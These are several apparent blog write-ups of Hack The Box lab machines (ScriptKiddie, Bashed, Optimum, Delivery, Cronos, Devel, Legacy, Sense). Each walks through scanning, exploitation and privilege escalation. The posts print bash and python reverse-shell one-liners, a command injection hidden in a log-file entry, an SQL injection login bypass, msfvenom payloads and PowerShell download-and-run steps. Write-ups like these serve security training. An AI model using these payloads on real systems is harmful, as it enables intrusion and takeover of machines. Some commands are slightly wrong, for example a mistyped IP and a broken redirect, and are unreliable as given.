Box Details

Summary

1. Connect HTB VPN connection.
2. Start the ScriptKiddie box from the HTB portal and ping the machine IP.
3. Start with Nmap. Found two ports 22 and 5555 open.
4. Browse http://10.10.10.226:5000.
5. Found functionality of msfvenom on a webpage.
6. Search Google for msfvenom exploit.
7. Found exploit.
8. Use msfconsole to generate msf.apk
9. Upload it on the web and set up a listener.
10. Got user kid.
11. Check scanlosers.sh
12. Rewrite hackers file and got pwn shell.
13. Check sudo permissions on the pwn shell.
14. sudo root and found the root flag.

Start with Nmap

Basic Scan

nmap 10.10.10.226

Run default scripts (-sC), enumerate version (-sV) against target.

nmap -sC -sV 10.10.10.226

Scan all ports once by using the -p- option. This step will ensure the coverage of all open ports.

nmap -p- 10.10.10.226

UDP scan

You can use the below command for UDP scan. Although, I have not found anything.

nmap -sU -p- 10.10.10.226

Check in Web Browser

Browse http://10.10.10.226:5000

Play with webpage. Just type IP to see response.

The webpage (payloads) shows a functionality similar to msfvenom tool. I have tried to search exploit of msfvenom that may help me to get user shell.

Found “Rapid7 Metasploit Framework msfvenom APK Template Command Injection”.

Read Description. As mentioned in description, This vulnerability helps in perform command injection. By using msfconsole, we will create apk file to upload on our web tool.

Open Metasploit on Kali machine. Now we will create apk file by using msfconsole.

msfconsole

Search exploit by typing below command.

search msfvenom

Found exploit. Now for creating apk file, use below command to select and then display options.

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

show options

Use ifconfig command to find IP and set it to lhost. lport you can put 1111.

set lhost 10.10.14.2

set lport 1111

set rhost 10.10.10.226

set rport 5555

Now apk file is generated by msfconsole. As mentioned in terminal, msf.apk stored at /home/kali/.msf4/local/msf.apk. Now select os as android and lhost is IP of your Kali system. Locate msf.apk and click on generate. But set up listener by using nc -lvnp 1111 command before click on generate.

Got reverse shell on nc. You can confirm user by using id and ifconfig command.

id

ifconfig

Get a interactive shell by using below command.

python3 -c 'import pty; pty.spawn("/bin/sh")'

Now navigate and use below commands to know more about remote system. Use pwd to know present working directory, cd for change directory, ls -l for listing files and wc for word count user.txt file.

pwd

cd ..

ls -l

wc user.txt

Privilege Escalation

Notice two user lid and pwn accounts. Two directories kid and pwn available. File pwn seems to be interesting.

Just browse the directory pwn. List out directories by using ls -l command.

ls -l

cat scanlosers.sh

Log file contains directory /home/kid/logs/hackers. Remember cut command truncate first two fields.

Just check permission by using ls -l command.

Use below command

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/2222 0>&1' #' >> hackers

nc -lvnp 2222

Got user pwn shell. Now get a interactive shell.

python3 -c 'import pty; pty.spawn("/bin/sh")'

Check sudo permissions. Found user msfconsole, login is allowed without password.

sudo -l

Sudo user msfconsole.

sudo msfconsole

Check id

Found root.txt file.

The post Hack The Box writeup – ScriptKiddie first appeared on All About Testing.

Box Details

Summary

1. Log into HTB VPN. Bashed machine IP is 10.10.10.68.
2. Start with NMap scan. Found only port 80 open
3. No other open port found in both TCP and UDP scan
4. Check web page by browsing http://10.10.10.68
5. Directory brute forcing by using tool ffuf
6. Found /dev directory.
7. Browse /dev. Found directory listing.
8. phpbash.php is one of the directories.
9. Search phpbash on Google and found it is a semi-interactive shell.
10. Click phpbash.php and navigate different directories.
11. Found user.txt flag in the home directory.
12. Take shell on the local machine by using python reverse shell script.
13. Got shell on the local system.
14. Try privilege escalation.
15. Use command sudo -l
16. sudo scriptmanager
17. Use python script for a reverse shell.
18. Found root.

NMap Scan

Basic Scan

nmap 10.10.10.68

Nmap scan with default scripts

nmap -sC -sV 10.10.10.68

Nmap scan to identify all open ports

nmap -p- 10.10.10.68

Nmap UDP scan

nmap -sU 10.10.10.69

Check Browser

Run ffuf for directory bruteforcing with -u and -w option

ffuf -u http://10.10.10.68/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

ffuf tool provide directory listing and found /dev directory

Search phpbash on google

phpbash is a standalone semi-interactive web shell. This will help us to find user flag.

Click on phpbash.min.php. Just write Linux commands and you get output.

Navigate little and found user flag in home directory.

Check python on remote machine by using which command.

which python 

Found python on remote machine. Now we can use python reverse shell script

Shell upgrade.

Enter below python command on web phpbash and to catch reverse shell, run nc -lvnp 1234 on Kali machine. Remember to change IP and port number in the below python command.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.16",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

nc -lvnp 1234

Get more interective shell using tty

python -c 'import pty; pty.spawn("/bin/sh")'

You can run privilege escalation script. But if you check sudo permissions on a remote machine, you have found user scriptmanager.

sudo -l

Directory scripts has execute permissions

The system allows sudo as scriptmanager without password. That means any user can login with the username scriptmanager without a password.

Use below command for directory listing /scripts.

ls -l

What we have noticed that test.txt file is updating every minute. Update IP and port in below script and set up a listener on Kali system.

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.16\",11111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > exploit.py

Set up listener on Kali

nc -lvnp 11111

Check root.

The post Hack The Box Writeup – Bashed first appeared on All About Testing.

Box Details

Start with Nmap

Run Nmap default scripts (-sC) and enumerate versions (-sV).

#nmap -sC -sV 10.10.10.8 | tee nmap-initial.txt

To check all open ports

 #nmap -p- 10.10.10.8 | tee nmap-all-ports.txt

Run UDP scan

#nmap -sU 10.10.10.8

As port 80 is open, try IP on web browser

Search on google to find exploit of HTTP File Server 2.3 and found CVE:2014-6287.

Read instruction to execute the payload

Identify nc.exe on Kali and copy it in current directory

#locate nc.exe

Edit payload with local IP and port. Save it. Use ifconfig to identify the IP address of your machine.

ip_addr = “10.10.14.16”

local_port = “1111”

Execute the exploit

#nc -lvnp 1111

#python -m SimpleHTTPServer 80

#python exploit.py 10.10.10.8 80

Got shell. Check user token

Privilege Escalation

Use systeminfo to identify information of OS

>systeminfo

Copy this output in text format (I have copied it in config-info.txt). Identify vulnerability by checking patches by using github repository code. Run privilege escalation exploit code by using below command:

#python windows-exploit-suggester.py --database 2020-12-02-mssb.xls --systeminfo config-info.txt

Many exploits available for privilege escalation. I have used “Microsoft Windows 8.1 (x64) – ‘RGNOBJ’ Integer Overflow (MS16-098)”. You can downlaod 41020.exe by using github repository.

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Transfer exe file to machine and execute it by using below command to get system.

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.9/41020.exe','C:\Users\kostas\Desktop\41020.exe')"

41020.exe

Check by command “whoami”. If output is below, got system.

nt authority\system

Conclusion

This article is a quick write-up on HTB Optimum Windows box. If you have some issues in any step, let me know in the comment section.

The post Hack The Box Optimum Writeup first appeared on All About Testing.

Summary

1. Run nmap to find open ports
2. As port 80 opens, check in browser
3. Click on HelpDesk and Contact Us page
4. Open a new ticket on HelpDesk page
5. Click on Mattermost on Contact Us page
6. Sign up using @delivery.htb email address on Mattermost generated after creation of new ticket
7. Check Ticket Status
8. Login on Mattermost
9. Use username and password to SSH
10. Found user.txt
11. Check config file and found mysql username, password
12. Login mysql and check User table
13. Found username and hashed password (bcrypt)
14. Use hashcat tool to decrypt password from hash
15. SSH to box and found root.txt

Start with Nmap

nmap 10.10.10.222

Run default scripts available in Nmap Database using -sC option, -sV is used to enumerate versions

nmap -sC -sV 10.10.10.222

Scan all ports with Nmap by using -p- options

nmap -p- 10.10.10.222

Run UDP scan with Nmap by using -sU option

nmap -sU 10.10.10.222

Do below entry in /etc/hosts

10.10.10.222 delivery.htb

Browse http://delivery.htb on Firefox

http://delivery.htb

Click on Contact us.

Read message on page carefully

“For unregistered users, please use our HelpDesk to get in touch with our team. Once you have an @delivery.htb email address, you’ll be able to have access to our MatterMost server.”

As mentioned in webpage, Click on HelpDesk.

Click on Open a New Ticket

Fill form and Create a new ticket. You received a below message after successful creation of ticket.

Click on MatterMost server. As you don’t have a account, Click on Create one now. Remember to use @delivery.htb email id for creation of account.

After successful creation of account, Check status again and you got a new message.

As suggest in message, activate email by copying url and paste it in browser. You got below message if you have paste correctly.

After successful login, Found credentials to the server.

As SSH port is also open, use credentials to connect remote host.

ssh maildeliverer@10.10.10.222

Just do ls and you found user.txt flag.

Privilege escalation

For privilege escalation, check config file. Config file contains a mysql username and password

Refer /opt/mattermost/config/config.json. Use below command for mysql credentials:

cat /opt/mattermost/config/config.json | grep user

Connect mysql

mysql -u mmuser -p

Display available databases

show databases;

Use database mattermost

use mattermost;

Use below command to display tables and Users table seems to be interesting.

show tables;

Just display username and password from table Users

select Username, Password from Users;

Save username and password in hash file. If you rehttp://allabouttesting.org/wp-content/uploads/2021/05/root-password-db.jpgfer messages, last message is saying related to password “PleaseSubscribe!”

Save it in file password.

Use hashcat command to create a wordlist and bruteforce to find match of exact password.

hashcat -m 3200 hash password --user -r /usr/share/hashcat/rules/best64.rule

Finally got matched password

Now just type su – to root

su -

The post Hack The Box Writeup – Delivery first appeared on All About Testing.

Summary:

• Run Nmap to find open ports and services
• Enumerate DNS
• Add IP and identified hostnames in /etc/hosts
• Enumerate HTTP
• Identify login on admin.cronos.htb
• Use SQL Injection to bypass login
• Check for Command Injection
• Reverse the shell and locate user.txt flag
• Transfer Linux Privilege scripts from the local machine to low privileged machine
• Results
• php reverse shell in crontab
• Reverse shell and locate root.txt

Start with Nmap

Initial Scan

nmap 10.10.10.13

Run default scripts

nmap -sC -sV 10.10.10.13

Scan all ports

nmap -p- 10.10.10.13

Run UDP scan

nmap -sU 10.10.10.13

Using dig command to identify urls

dig axfr cronos.htb @10.10.10.13

Add urls in /etc/hosts by using nano /etc/hosts

Check admin.cronos.htb on browser

Try using SQL Injection Payloads from link, able to login successfully by using below payload

' or 1=1 limit 1 -- -+

Try command injection, use ls command. It confirms command injection vulnerability is available in web application.

Intercept request in Burpsuite and use command injection vulnerability to get a reverse shell.

bash -c 'bash -i /dev/tcp/10.10.14.16/8000 0>&1'

Got user.txt

Privilege escalation

Spawn a tty shell

python -c 'import pty; pty.spawn("/bin/sh")'

Run below commands to know the flavor of box

uname -a

cat /proc/version

cat /etc/issue

Identify Privilege Escalation script for Ubuntu 16.04.2. Click Here to download on local machine and then transfer it on compromised machine.

Run Privilege Escalation script

./linpeas.sh

Found /var/www/laravel/artisan on run of linpeas.sh script

Check crontab

Download php-reverse-shell.php script

Change local IP and port number

To catch a reverse shell, set nc and run php script

Got a reverse shell

Got root.

The post Hack The Box (HTB) Writeup – Cronos first appeared on All About Testing.

Devel is a retired box with difficulty level Easy.

Start with nmap

#nmap -sC -sV 10.10.10.5

• -sC scan using default scripts against the target
• -sV enumerated versions

Two ports open: 21 (ftp) and 80 (http)

Use nmap to scan all ports (0-65535)

#nmap -p- 10.10.10.5 | tee nmap nmap-all-ports.txt

• -p- scan all ports
• tee save it in the file and also gives standard output

nmap UDP scan

#nmap -sU 10.10.10.5 | tee nmap-udp.txt

No ports found in UDP scan

Check webpage as port 80 open

Anonymous login allowed on ftp. Try to upload test.html

Successfully upload test.html. This gives an idea of upload payload and gets a reverse shell.

msfvenom – tool to create reverse shell

List all modules for formats

#msfvenom -l formats

List all windows paylods.

#msfvenom --list payloads | grep windows

Create payload by using msfvenom

#msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.10.21 LPORT=1111 -o shell.aspx

Upload payload on server as anonymous login is allowed on ftp.

#put shell.aspx

Getting reverse shell

#nc -lvnp 1111

Get shell.

Try to access folder Administrator and babis, but access denied.

Privilege Escalation

#systeminfo

The operating system is Windows 7 Enterprise but no hotfix is installed. This gives an idea to execute any existing exploit. Search on it on google and found MS11-046. EDB-ID is 40564 and CVE 2011-1249.

#searchsploit -m 40564

Refer exploit notes to understand how to compile exploit code.

Compile by using below command:

#i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

Upload it on machine

#powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.21:2222/MS11-046.exe', 'C:\Users\Public\Downloads\MS11-046.exe')"

Run privilege escalation exploit

#MS11-046.exe

Get root

The post Devel – Hack The Box (HTB) writeup w/o Metasploit first appeared on All About Testing.

Today we will solve Legacy Hack The Box.

Start with Nmap

#nmap -sC -sV 10.10.10.4

3 ports are open – 139 (netbios-ssn), 445 (microsoft-ds) and 3389 (ms-wbt-server)

Scan UDP ports

#nmap -sU 10.10.10.4

Found open port 137

Try smbmap and smbclient tools, but not found anything

#smbmap -H 10.10.10.4

#smbclient -N -L //10.10.10.4

Identify scripts related to smb

#ls /usr/share/nmap/scripts/ | grep smb

Run nmap smb scripts to identify vulnerability

#nmap --script=smb-vuln* 10.10.10.4

Two vulnerabilities: ms08-067 and ms17-010

ms17-010 – Get exploit code from this github repository

Generate payload (exploit) by using msfvenom

#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o exploit.exe

Download script

wget https://github.com/helviojunior/MS17-010/master/send_and_execute.py

Run exploit

#python send_and_execute.py 10.10.10.4 exploit.exe

Start a listener while execute and get a reverse shell

#nc -lvnp 443

Try whoami and not found

Search on kali

Share that folder containing whoami.exe over SMB with the command

#smbserver.py a /usr/share/windows-binaries/

Use below command to run whoami

system32>\\10.10.14.21\a\whoami.exe

NT AUTHORITY\SYSTEM confirms root

The post Legacy – Hack The Box (HTB) write-up first appeared on All About Testing.

Using nmap – identifying open ports

#nmap -sC -sV 10.10.10.60 | tee nmap-initial.txt

-sC: run default scripts

-sV: enumerate version

tee command is used to write output in file.

Only 2 ports http (80) and https (443) are open.

#nmap -p- 10.10.10.60 | tee nmap-allports.txt

-p- : scanning all ports

No new ports found. It is awesome as now we know our attack vector is a web application.

Visit nmap tutorial for more useful commands

Nikto – web server scanner

#nikto -h https://10.10.10.60 | tee nikto.txt

Browse webpage https://10.10.10.60/

Now enumerate by using gobuster. This tool helps in enumerating directory/file and DNS.

#gobuster -k -u  http://10.10.10.60/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

-u: target url

-w: wordlist used for enumerate files/directory

-k: skip SSL certificate verification

Two directories (/system-users.txt and /changelog.txt) have been found. Scan taken a long time to give /system-users.txt.

Found username: Rohit. Also webpage seems to be the login page of firewall.

Now search google and find default password.

Found password: pfsense.

Now login with identified credentials.

Found exact version of 2.1.3 of sense firewall.

Now search exploits of pfsense firewall available on kali by using searchsploit command.

#searchsploit pfsense

Copy python exploit 43560.py and rename as shell.py. Identify syntax by viewing the code. Remember to use python3 else exploit won’t run successfully.

#python3 shell.py --rhost 10.10.10.60 --lhost 10.10.14.20 --lport 1111 --username rohit --password pfsense

#nc -lvnp 1111

Got root.

The post Hack the Box (HTB) Machine Writeup – Sense first appeared on All About Testing.